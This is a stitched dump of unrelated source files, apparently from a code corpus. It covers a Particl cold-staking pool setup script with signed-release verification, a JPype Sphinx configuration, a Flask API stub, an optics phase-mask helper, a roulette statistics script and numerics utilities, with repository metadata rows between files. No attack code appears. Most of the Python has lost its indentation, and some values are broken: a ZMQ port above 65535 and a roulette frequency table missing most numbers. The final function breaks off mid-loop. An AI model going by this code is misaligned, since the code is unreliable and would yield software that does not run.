subprocess.check_call(['wget', url_sig + '-build.assert', '-P', PARTICL_BINDIR])
sig_path = os.path.join(PARTICL_BINDIR, 'particl-%s-%s-build.assert.sig' % (os_name, PARTICL_VERSION))
if not os.path.exists(sig_path):
subprocess.check_call(['wget', url_sig + '-build.assert.sig?raw=true', '-O', sig_path])
packed_path = os.path.join(PARTICL_BINDIR, 'particl-%s-%s' % (PARTICL_VERSION, PARTICL_ARCH))
if not os.path.exists(packed_path):
subprocess.check_call(['wget', url_release, '-P', PARTICL_BINDIR])
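    # Verify the download: hash the release tarball and check that the digest
    # appears in the GPG-signed gitian build assert file fetched above.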
hasher = hashlib.sha256()
with open(packed_path, 'rb') as fp:
hasher.update(fp.read())
release_hash = hasher.digest()
print('Release hash:', release_hash.hex())
with open(assert_path, 'rb', 0) as fp, mmap.mmap(fp.fileno(), 0, access=mmap.ACCESS_READ) as s:
if s.find(bytes(release_hash.hex(), 'utf-8')) == -1:
sys.stderr.write('Error: release hash %s not found in assert file.' % (release_hash.hex()))
exit(1)
else:
print('Found release hash %s in assert file.' % (release_hash.hex()))
try:
subprocess.check_call(['gpg', '--list-keys', signing_key_fingerprint])
except Exception:
print('Downloading release signing pubkey')
keyservers = ['keyserver.ubuntu.com', 'hkp://subset.pool.sks-keyservers.net']
for ks in keyservers:
try:
subprocess.check_call(['gpg', '--keyserver', ks, '--recv-keys', signing_key_fingerprint])
except Exception:
continue
break
subprocess.check_call(['gpg', '--list-keys', signing_key_fingerprint])
try:
subprocess.check_call(['gpg', '--verify', sig_path, assert_path])
except Exception:
sys.stderr.write('Error: Signature verification failed!')
exit(1)
def extractParticlCore():
packed_path = os.path.join(PARTICL_BINDIR, 'particl-%s-%s' % (PARTICL_VERSION, PARTICL_ARCH))
daemon_path = os.path.join(PARTICL_BINDIR, PARTICLD)
bin_prefix = 'particl-%s/bin' % (PARTICL_VERSION)
subprocess.check_call(['tar', '-xvf', packed_path, '-C', PARTICL_BINDIR, '--strip-components', '2',
os.path.join(bin_prefix, PARTICLD), os.path.join(bin_prefix, PARTICL_CLI), os.path.join(bin_prefix, PARTICL_TX)])
output = subprocess.check_output([daemon_path, '--version'])
version = output.splitlines()[0].decode('utf-8')
print('particld --version\n' + version)
assert(PARTICL_VERSION in version)
def printVersion():
from coldstakepool import __version__
print('Particl coldstakepool version:', __version__)
def printHelp():
    print('Usage: coldstakepool-prepare.py ')
print('\n--update_core Download, verify and extract Particl core release and exit.')
print('\n--download_core Download and verify Particl core release and exit.')
print('\n--datadir=PATH Path to Particl data directory, default:~/.particl.')
print('\n--pooldir=PATH Path to stakepool data directory, default:{datadir}/stakepool.')
print('\n--mainnet Run Particl in mainnet mode.')
print('\n--testnet Run Particl in testnet mode.')
print('\n--regtest Run Particl in regtest mode.')
print('\n--stake_wallet_mnemonic= Recovery phrase to use for the staking wallet, default is randomly generated.')
print('\n--reward_wallet_mnemonic= Recovery phrase to use for the reward wallet, default is randomly generated.')
print('\n--mode=master/observer Mode stakepool is initialised to. observer mode requires configurl to be specified, default:master.')
print('\n--configurl=url Url to pull the stakepool config file from when initialising for observer mode.')
def main():
dataDir = None
poolDir = None
chain = 'mainnet'
mode = 'master'
configurl = None
stake_wallet_mnemonic = None
reward_wallet_mnemonic = None
for v in sys.argv[1:]:
if len(v) < 2 or v[0] != '-':
print('Unknown argument', v)
continue
s = v.split('=')
name = s[0].strip()
for i in range(2):
if name[0] == '-':
name = name[1:]
if name == 'v' or name == 'version':
printVersion()
return 0
if name == 'h' or name == 'help':
printHelp()
return 0
if name == 'update_core':
downloadParticlCore()
extractParticlCore()
return 0
if name == 'download_core':
downloadParticlCore()
return 0
if name == 'mainnet':
continue
if name == 'testnet':
chain = 'testnet'
continue
if name == 'regtest':
chain = 'regtest'
continue
if len(s) == 2:
if name == 'datadir':
dataDir = os.path.expanduser(s[1])
continue
if name == 'pooldir':
poolDir = os.path.expanduser(s[1])
continue
if name == 'stake_wallet_mnemonic':
stake_wallet_mnemonic = s[1]
continue
if name == 'reward_wallet_mnemonic':
reward_wallet_mnemonic = s[1]
continue
if name == 'mode':
mode = s[1]
if mode != 'master' and mode != 'observer':
sys.stderr.write('Unknown value for mode:' + mode)
exit(1)
continue
if name == 'configurl':
configurl = s[1]
continue
print('Unknown argument', v)
if mode == 'observer' and configurl is None:
sys.stderr.write('observer mode requires configurl set\n')
exit(1)
if not os.path.exists(PARTICL_BINDIR):
os.makedirs(PARTICL_BINDIR)
# 1. Download and verify the specified version of particl-core
downloadParticlCore()
extractParticlCore()
dataDirWasNone = False
if dataDir is None:
dataDir = os.path.expanduser('~/.particl')
dataDirWasNone = True
if poolDir is None:
if dataDirWasNone:
poolDir = os.path.join(os.path.expanduser(dataDir), ('' if chain == 'mainnet' else chain), 'stakepool')
else:
poolDir = os.path.join(os.path.expanduser(dataDir), 'stakepool')
print('dataDir:', dataDir)
print('poolDir:', poolDir)
if chain != 'mainnet':
print('chain:', chain)
if not os.path.exists(dataDir):
os.makedirs(dataDir)
if not os.path.exists(poolDir):
os.makedirs(poolDir)
# 2. Create a particl.conf
daemonConfFile = os.path.join(dataDir, 'particl.conf')
if os.path.exists(daemonConfFile):
sys.stderr.write('Error: %s exists, exiting.' % (daemonConfFile))
exit(1)
zmq_port = 207922 if chain == 'mainnet' else 208922
with open(daemonConfFile, 'w') as fp:
if chain != 'mainnet':
fp.write(chain + '=1\n\n')
fp.write('zmqpubhashblock=tcp://127.0.0.1:%d\n' % (zmq_port))
chain_id = 'test.' if chain == 'testnet' else 'regtest.' if chain == 'regtest' else ''
fp.write(chain_id + 'wallet=pool_stake\n')
fp.write(chain_id + 'wallet=pool_reward\n')
fp.write('csindex=1\n')
fp.write('addressindex=1\n')
startDaemon(dataDir, PARTICL_BINDIR)
# Delay until responding
for k in range(10):
try:
callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'getblockchaininfo')
break
except Exception:
time.sleep(0.5)
try:
if mode == 'observer':
print('Preparing observer config.')
settings = json.loads(urllib.request.urlopen(configurl).read().decode('utf-8'))
settings['mode'] = 'observer'
settings['particlbindir'] = PARTICL_BINDIR
settings['particldatadir'] = dataDir
pool_stake_address = settings['pooladdress']
pool_reward_address = settings['rewardaddress']
v = callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'validateaddress "%s"' % (pool_stake_address))
assert('isvalid' in v)
assert(v['isvalid'] is True)
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake importaddress "%s"' % (v['address']))
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_reward importaddress "%s"' % (pool_reward_address))
poolConfFile = os.path.join(poolDir, 'stakepool.json')
if os.path.exists(poolConfFile):
sys.stderr.write('Error: %s exists, exiting.' % (poolConfFile))
exit(1)
with open(poolConfFile, 'w') as fp:
json.dump(settings, fp, indent=4)
print('Done.')
return 0
# 3. Generate and import a recovery phrase for both wallets.
if stake_wallet_mnemonic is None:
stake_wallet_mnemonic = callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'mnemonic new')['mnemonic']
if reward_wallet_mnemonic is None:
reward_wallet_mnemonic = callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'mnemonic new')['mnemonic']
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake extkeyimportmaster "%s"' % (stake_wallet_mnemonic))
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_reward extkeyimportmaster "%s"' % (reward_wallet_mnemonic))
# 4. Generate the pool_stake_address from the staking wallet.
pool_stake_address = callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake getnewaddress')
pool_stake_address = callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake validateaddress %s true' % (pool_stake_address))['stakeonly_address']
# 5. Generate the pool_reward_address from the reward wallet.
pool_reward_address = callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_reward getnewaddress')
# 6. Disable staking on the reward wallet.
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_reward walletsettings stakingoptions "{\\"enabled\\":\\"false\\"}"')
# 7. Set the reward address of the staking wallet.
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake walletsettings stakingoptions "{\\"rewardaddress\\":\\"%s\\"}"' % (pool_reward_address))
finally:
callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'stop')
# 8. Create the stakepool.json configuration file.
html_port = 9000 if chain == 'mainnet' else 9001
poolsettings = {
'mode': 'master',
'debug': True,
'particlbindir': PARTICL_BINDIR,
'particldatadir': dataDir,
'startheight': 200000, # Set to a block height before the pool begins operating
'pooladdress': pool_stake_address,
'rewardaddress': pool_reward_address,
'zmqhost': 'tcp://127.0.0.1',
'zmqport': zmq_port,
'htmlhost': 'localhost',
'htmlport': html_port,
'parameters': [
{
'height': 0,
'poolfeepercent': 3,
'stakebonuspercent': 5,
'payoutthreshold': 0.5,
'minblocksbetweenpayments': 100,
'minoutputvalue': 0.1,
},
]
}
poolConfFile = os.path.join(poolDir, 'stakepool.json')
if os.path.exists(poolConfFile):
sys.stderr.write('Error: %s exists, exiting.' % (poolConfFile))
exit(1)
with open(poolConfFile, 'w') as fp:
json.dump(poolsettings, fp, indent=4)
print('NOTE: Save both the recovery phrases:')
print('Stake wallet recovery phrase:', stake_wallet_mnemonic)
print('Reward wallet recovery phrase:', reward_wallet_mnemonic)
print('Stake address:', pool_stake_address)
print('Reward address:', pool_reward_address)
print('Done.')
if __name__ == '__main__':
main()

# File: felpy/model/materials/phase_mask.py (repo: twguest/FELpy, license: Apache-2.0)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
FELPY
__author__ = "Trey Guest"
__credits__ = ["Trey Guest"]
__license__ = "EuXFEL"
__version__ = "1.0.1"
__maintainer__ = "Trey Guest"
__email__ = "[email protected]"
__status__ = "Developement"
"""
import numpy as np
from wpg.srwlib import SRWLOptD as Drift
from felpy.model.src.coherent import construct_SA1_wavefront
from felpy.model.core.beamline import Beamline
from wpg.srwlib import srwl_opt_setup_surf_height_2d as OPD
from wpg.wpg_uti_wf import plot_intensity_map as plotIntensity
from matplotlib import pyplot as plt
from felpy.model.materials.material_utils import add_extent
def plot_phase(wfr):
phase = wfr.get_phase()[:,:,0]
plt.imshow(phase, cmap = 'hsv')
plt.show()
def phase_mask(phase_shift, extent, wav, _ang = 0, outdir = None, maskName = None):
"""
:param phase_shift: 2D array of desired phase-shifts
:param extent: extent of phase-mask array in realspace
    :param wav: radiation wavelength
    :param _ang: rotation angle forwarded to the SRW optical-path-difference element
    :param outdir: optional output directory for the saved height-error profile
    :param maskName: optional filename stem for the saved profile
    """
height_error = (phase_shift*wav)/(2*np.pi)
height_error = add_extent(height_error, extent)
if outdir is not None:
if maskName is not None:
outdir = outdir + maskName + ".dat"
else:
outdir = outdir + "phase_mask.dat"
np.savetxt(outdir, height_error)
return OPD(height_error,
_dim = 'x',
               _ang = _ang,
_refl = 1,
_x = 0, _y = 0)

# File: nere/re_models/__init__.py (repo: WangShengguang/NERE, license: MIT)

from .acnn import ACNN
from .att_bilstm import ATT_BiLSTM
from .bert_multitask import BERTMultitask
from .bert_softmax import BERTSoftmax
from .bilstm import BiLSTM
from .bilstm_att import BiLSTM_ATT
__all__ = ["ACNN", "BERTSoftmax", "BERTMultitask", "ATT_BiLSTM", "BiLSTM", "BiLSTM_ATT"]

# File: appengine/findit/model/base_try_job_data.py (repo: mcgreevy/chromium-infra, license: BSD-3-Clause)

# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from google.appengine.ext import ndb
from model.base_try_job import BaseTryJob
class BaseTryJobData(ndb.Model):
"""Represents a tryjob's metadata."""
# When this entity was created.
created_time = ndb.DateTimeProperty(indexed=True)
# When the try job completed.
end_time = ndb.DateTimeProperty(indexed=True)
# Error message and reason, if any.
error = ndb.JsonProperty(indexed=False)
# Error code if anything went wrong with the try job.
error_code = ndb.IntegerProperty(indexed=True)
# The last buildbucket build response received.
last_buildbucket_response = ndb.JsonProperty(indexed=False, compressed=True)
# When the try job was requested according to buildbucket.
request_time = ndb.DateTimeProperty(indexed=True)
# When the try job began executing.
start_time = ndb.DateTimeProperty(indexed=True)
# The url to the try job build page.
try_job_url = ndb.StringProperty(indexed=False)
# An ndb key to the try job entity this data is associated with.
try_job_key = ndb.KeyProperty(indexed=False)
# A URL to call back the pipeline monitoring the progress of this tryjob.
callback_url = ndb.StringProperty(indexed=False)
# The name of the target for the callback url
callback_target = ndb.StringProperty(indexed=False)
@ndb.ComputedProperty
def master_name(self): # pragma: no cover
return BaseTryJob.GetMasterName(self.try_job_key)
@ndb.ComputedProperty
def builder_name(self): # pragma: no cover
return BaseTryJob.GetBuilderName(self.try_job_key)

# File: api.py (repo: zhengsl/SmartInvetory, license: Apache-2.0)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from dao_base import *
from flask import jsonify
@app.route('/smartinventory/decision/base/province/<names>', methods=['GET'])
def get_base_province(names):
if names == 'all':
return jsonify(query_province_all())
else:
result = []
for name in names.split(','):
p = query_province_by_name(name)
if not p:
p = query_province_by_fullname(name)
if p:
result.append(p)
return jsonify(result)
@app.route('/smartinventory/decision/base/province_city/<name>/<pid>', methods=['GET'])
def get_base_province_city(name, pid):
return 'Hello API 1.2'
@app.route('/smartinventory/decision/base/city/<name>', methods=['GET'])
def get_base_city(name):
return 'Hello API 1.3'
@app.route('/smartinventory/decision/base/express/sf/<from_city>/<to_city>', methods=['GET'])
def get_base_express_sf(from_city, to_city):
return 'Hello API 1.4'
@app.route('/smartinventory/decision/base/metadata/<data_id>', methods=['GET'])
def get_base_metadata(data_id):
return 'Hello API 1.5'
@app.route('/smartinventory/decision/stats/sales/province', methods=['POST'])
def stat_sales_province():
return 'Hello API 2.1'
@app.route('/smartinventory/decision/stats/sales/city', methods=['POST'])
def stat_sales_city():
return 'Hello API 2.2'
@app.route('/smartinventory/decision/stats/packages/province', methods=['POST'])
def stat_packages_province():
return 'Hello API 2.3'
@app.route('/smartinventory/decision/stats/packages/city', methods=['POST'])
def stat_packages_city():
return 'Hello API 2.4'
@app.route('/smartinventory/decision/stats/express/province', methods=['POST'])
def stat_express_cost_province():
return 'Hello API 2.5'
@app.route('/smartinventory/decision/stats/express/city', methods=['POST'])
def stat_express_cost_city():
return 'Hello API 2.6'
@app.route('/smartinventory/decision/plan/warehouse/static', methods=['POST'])
def plan_warehouse_static():
return 'Hello API 3.1'
@app.route('/smartinventory/decision/plan/warehouse/dynamic', methods=['POST'])
def plan_warehouse_dynamic():
return 'Hello API 3.2'
@app.route('/smartinventory/decision/forecast/sales/province', methods=['POST'])
def forecast_sales_province():
return 'Hello API 4.1'
@app.route('/smartinventory/decision/forecast/sales/city', methods=['POST'])
def forecast_sales_city():
return 'Hello API 4.2'
if __name__ == '__main__':
app.run(api_host, api_port)

# File: param.py (repo: facebookresearch/neuromorph, license: BSD-2-Clause)

# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
import pathlib
import os
from datetime import datetime
path_curr = str(pathlib.Path(__file__).parent.absolute())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device_cpu = torch.device('cpu')
data_folder_faust_remeshed = "data/meshes/FAUST_r/mat"
data_folder_mano_right = "data/meshes/MANO_right/mat"
data_folder_mano_test = "data/meshes/MANO_test/mat"
data_folder_shrec20 = "data/meshes/SHREC_r/mat"
chkpt_folder = "data/checkpoint"
data_folder_out = "data/out"
def get_timestr():
now = datetime.now()
time_stamp = now.strftime("%Y_%m_%d__%H_%M_%S")
print("Time stamp: ", time_stamp)
return time_stamp
def save_path(folder_str=None):
if folder_str is None:
folder_str = get_timestr()
folder_path_models = os.path.join(chkpt_folder, folder_str)
print("Checkpoint path: ", folder_path_models)
return folder_path_models
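if __name__ == "__main__":
    # Illustrative only (not part of the original module): prints a fresh,
    # timestamped checkpoint path such as data/checkpoint/2024_01_01__12_00_00.
    print(save_path())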
| 27.717949 | 69 | 0.749306 |
4a25754a88d98bd0b88562f9d9ebbeebd449a020 | 10,896 | py | Python | doc/conf.py | baztian/jpype | 034d44e6c719995c25e9cd61348ebc1860030a9b | [
"Apache-2.0"
] | null | null | null | doc/conf.py | baztian/jpype | 034d44e6c719995c25e9cd61348ebc1860030a9b | [
"Apache-2.0"
] | null | null | null | doc/conf.py | baztian/jpype | 034d44e6c719995c25e9cd61348ebc1860030a9b | [
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# JPype documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 26 20:16:40 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.napoleon', 'sphinx.ext.autodoc', 'sphinx.ext.autosectionlabel', 'readthedocs_ext.readthedocs', ]
autosectionlabel_prefix_document = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'JPype'
copyright = u'2014-18, Steve Menard, Luis Nell and others'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from unittest import mock
def TypeMock_init(self, *args, **kwargs):
object.__init__(self)
def TypeMock_getattr(self, key):
kwargs = self._kwargs
m = self._to(**kwargs)
object.__setattr__(self, key, m)
return m
class TypeMock(type):
def __new__(cls, name, bases=None, members={}, to=mock.Mock, **kwargs):
if not bases:
bases = tuple([])
members['__init__'] = TypeMock_init
members['__getattr__'] = TypeMock_getattr
members['_kwargs'] = kwargs
members['_to'] = to
members['__slots__'] = []
return type.__new__(cls, name, bases, members)
def __init__(self, *args, **kwargs):
return type.__init__(self, *args)
def __getattr__(self, key):
kwargs = self._kwargs
m = self._to(**kwargs)
type.__setattr__(self, key, m)
return m
class _JClass(type):
pass
class _JClassHints(object):
def __init__(self):
self.bases = []
def _addClassBases(self, *args):
pass
def _addTypeConversion(self, *args):
pass
def _addAttributeConversion(self, *args):
pass
def _excludeConversion(self, *args):
pass
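# The stubs above stand in for the compiled _jpype extension so that Sphinx
# can import the pure-Python package without a JVM; the MagicMock below is
# registered under that module name before jpype itself is imported.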
mockModule = mock.MagicMock()
mockModule.isStarted = mock.Mock(return_value=False)
mockModule._JArray = TypeMock("_JArray")
mockModule._JClass = _JClass
mockModule._JField = TypeMock("_JField")
mockModule._JMethod = TypeMock("_JMethod")
mockModule._JObject = TypeMock("_JObject")
mockModule._JPackage = TypeMock("_JPackage")
mockModule._JClassHints = _JClassHints
mockModule._hasClass = lambda x: False
sys.modules['_jpype'] = mockModule
# For some reason jpype.imports does not work if called in sphinx. Importing
# it here solved the problem.
import jpype
import jpype.imports
version = jpype.__version__
# The full version, including alpha/beta/rc tags.
release = jpype.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# on_rtd is whether we are on readthedocs.org, this line of code grabbed from docs.readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# otherwise, readthedocs.org uses their theme by default, so no need to specify it
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_context = {
'css_files': [
'_static/theme_overrides.css', # override wide tables in RTD theme
],
}
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'JPypedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'JPype.tex', u'JPype Documentation',
u'Steve Menard, Luis Nell and others', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'jpype', u'JPype Documentation',
[u'Steve Menard, Luis Nell and others'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'JPype', u'JPype Documentation',
u'Steve Menard, Luis Nell and others', 'JPype', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
napoleon_custom_sections = ["Static Methods", "Virtual Methods", "Constructors"]
| 30.866856 | 122 | 0.709435 |
4a25755b452adc4c207c377deb9f8adfae71cf3d | 3,118 | py | Python | Beat-The-Roulette.py | robyg72/BeatTheRoulette | c9dc548edf9ba04c8fab224f99e2b6efa2887e85 | [
"MIT"
] | null | null | null | Beat-The-Roulette.py | robyg72/BeatTheRoulette | c9dc548edf9ba04c8fab224f99e2b6efa2887e85 | [
"MIT"
] | null | null | null | Beat-The-Roulette.py | robyg72/BeatTheRoulette | c9dc548edf9ba04c8fab224f99e2b6efa2887e85 | [
"MIT"
] | null | null | null |
# percentage of even vs odd numbers
# percentage of red vs black numbers
# percentage per dozen
reds = [1, 3, 5, 7, 9, 12, 14, 16, 18, 19, 21, 23, 25, 27, 30, 32, 34, 36]
blacks = [2, 6, 4, 8, 10, 11, 13, 15, 17, 20, 22, 24, 26, 28, 29, 31, 33, 35]
class Outcome(object):
def __init__(self, number):
# store the number drawn
self.number = int(number)
# set if number is even or odd
if self.number % 2 == 0:
self.is_even = True
else:
self.is_even = False
# set if number is zero
if self.number == 0:
self.is_zero = True
else:
self.is_zero = False
# set color of the number
if self.number in reds:
self.is_red = True
else:
self.is_red = False
if self.number in blacks:
self.is_black = True
else:
self.is_black = False
def __str__(self):
if self.is_even:
parity = "even"
else:
parity = "odd"
if self.is_zero:
parity = "is zero"
color = ""
else:
if self.is_red:
color = "RED"
else:
color = "BLACK"
return str(self.number) + " " + parity + " " + color
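# Quick self-check of Outcome (added for illustration, not in the original
# script): 3 is an odd red number, 0 is zero and carries no colour.
def _check_outcome():
    assert Outcome(3).is_red and not Outcome(3).is_even
    assert Outcome(0).is_zero and not Outcome(0).is_red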
class Roulette(object):
def __init__(self):
self.lastOutcome = None
self.mean = 0
self.red_percentage = 0
self.black_percentage = 0
self.odd_percentage = 0
self.even_percentage = 0
self.numbers = [] # store each Outcome drawn
self.extractionNumber = 0
self.frequency = {"0": 0,
"1": 0, "2": 0, "3": 0, "4": 0, "5": 0, "6": 0, "7": 0, "8": 0, "9": 0, "10": 0, "11": 0,
"12":0, "13":0, "14":0, "15":0, "16": 0,
"34": 0, "35": 0, "36": 0} # store frequency outcomes for each figure
# Calculates the mean value after each extraction
def __mean(self):
m = 0
if len(self.numbers) > 0:
for n in self.numbers:
m = m + n.number
            m = float(m) / len(self.numbers)
else:
m = 0
return m
def new_outcome(self, number):
outcome = Outcome(number)
self.lastOutcome = outcome
self.numbers.append(outcome)
if str(outcome.number) in self.frequency:
self.frequency[str(outcome.number)] = self.frequency[str(outcome.number)] + 1
self.extractionNumber = len(self.numbers)
        # Recount from scratch so repeated calls do not inflate the tallies.
        self.even_percentage = 0
        self.odd_percentage = 0
        for o in self.numbers:
if o.number != 0:
if o.number % 2 == 0:
self.even_percentage += 1
else:
self.odd_percentage += 1
if __name__ == "__main__":
r = Roulette()
cmd = '0'
    while cmd != '99':
        cmd = raw_input("Number drawn ('99' to quit) ")
        if cmd == '99':
            break
        r.new_outcome(cmd)
        print "------------------------------"
        print "Number of draws " + str(r.extractionNumber)
for e in r.numbers:
print e
print "------------------------------" | 29.695238 | 115 | 0.480757 |
4a2575ddd78fee5390f03a021e0690d51d32542c | 1,863 | py | Python | phenum/numerics.py | wsmorgan/phonon-enumeration | 5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd | [
"MIT-0"
] | 5 | 2016-06-17T05:39:27.000Z | 2021-05-30T21:02:08.000Z | phenum/numerics.py | wsmorgan/phonon-enumeration | 5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd | [
"MIT-0"
] | 66 | 2016-04-02T05:02:08.000Z | 2018-07-05T19:43:09.000Z | phenum/numerics.py | wsmorgan/phonon-enumeration | 5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd | [
"MIT-0"
] | 5 | 2017-03-15T21:28:44.000Z | 2020-01-09T14:44:45.000Z |
"""Numerical methods for mathematical functions needed for the program"""
import numpy as np
#This method finds the factorial of a given number(num).
#The method calls for an integer input num
#The method returns the factorial(represented as fact in the method)
def factorial(num):
"""Finds the factorial of the input integer.
Args:
num (int): The integer to find the factorial of.
Returns:
fact (int): The factorial of num.
"""
#If the number provided is zero then the factorial is 1
if num == 0:
fact = 1
#Otherwise set fact to 1 and begin finding the factorial r is
#used to find each num-n for n=0 to n=num each value in r is
#then used to compute the factorial
else:
fact = 1
r = list(range(1,num+1))
for i in r:
fact *= i
return fact
def binomial_coefficient(n, k):
"""Finds the binomial coefficient n choose k. See
https://en.wikipedia.org/wiki/Binomial_coefficient for details.
Args:
n (int): An integer.
k (int): An integer.
Returns:
t (int): The binomial coefficient, n choose k.
"""
if not (-1 < k < n+1):
return 0
if k==0 and n == 0:
return 1
t = 1
if k < n-k:
for i in range(n, n-k, -1):
t = t*i//(n-i+1)
else:
for i in range(n, k, -1):
t = t*i//(n-i+1)
return t
def multinomial(n):
"""Finds the multinomial coefficient for a given array of numbers.
Args:
n (list): the interegs to be used.
"""
binomials = [[np.sum(n),n[0]]]
for i in range(1,len(n)):
